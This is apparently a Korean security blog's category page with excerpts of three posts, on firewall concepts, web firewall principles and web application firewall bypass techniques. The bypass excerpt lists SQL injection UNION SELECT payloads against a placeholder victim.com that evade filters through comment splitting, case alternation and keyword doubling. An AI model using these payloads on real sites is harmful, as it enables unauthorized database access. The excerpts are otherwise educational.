방화벽3 침입차단시스템(Firewall) 개념 및 구성요소 침입차단시스템은 접근제어목록(ACL, Access Control List)을 통해 네트워크에 전송되는 트래픽에 대한 보안 정책을 설정한다. 침입차단시스템의 기본 목적은 네크워크 사용자에게 가능한 한 투명성을 보장하면서 위험지대를 줄이고자 하는 적극적인 보안 대책을 제공하는 것이다 침입차단시스템은 기업의 네트워크 보안 정책을 지원하고 집행하는 장비이며 실제로 라우터,서버 또는 전문화된 하드웨어 장비일 수도 있는 게이트웨이 유형 중 하나임. 방화벽은 특별한 형태의 참조모니터이다. 방화벽을 네트워크 안의 적절한 위치에 배치함으로써 제어하고자 하는 모든 네트워크 접근이 방화벽을 경유하도록 만들 수 있다. 방화벽의 기능 및 역할 침입차단시스템이란 내/외부 네트워크 사이에서 접근제어 정책을 구현하는 시스템을 말한다.. 2020. 5. 17. 웹 방화벽 우회기법 1. 기본적인 우회 기법 1) 주석처리 방법 http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3..... http://victim.com/news.php?id=1+/*!union*/ /*!select*/ 1,2,3,4…. 2) 대소문자 교체 방법 * 방화벽 필터설정이 다음과 같을 때 /union\select/g http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3... 3) 단어 대체 방법 일부 방화벽에서는 SQL 키워드를 제거하는 방식을 사용. http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3-- (어떤 WAF는 소문자 "union"과 "se.. 2019. 12. 24. 웹 방화벽의 개념과 원리 웹 방화벽의 개념과 원리 웹 방화벽을 설명하기 앞서 웹 방화벽과 일반 네트워크 방화벽은 둘 다 "방화벽"이라는 단어를 사용한다 하지만 둘의 동작 방법에는 차이가 있다. 먼저 네트워크 방화벽의 동작원리는 네트워크에 돌아다니고 있는 패킷이 정상인지 아닌지를 판단한다. 반면에 웹 방화벽은 패킷이 아닌 사용자의 URL이 정상이고 올바른 요청인지 판단을 하게된다. OSI 7 Layer에 비교를 해보도록 하자. 일반 방화벽은 패킷이 돌아다니게 되는 L3~L4(Network Layer)레벨에 동작한다. 웹 방화벽은 HTTP/HTTPS 요청이 있는 L7(Application Layer)레벨에서 동작한다. 자 그럼 웹 방화벽이란 무엇이며 동작원리와 개념을 알아보자. 레고레고~~~ 웹 방화벽(Web Application .. 2019. 12. 24. 이전 1 다음
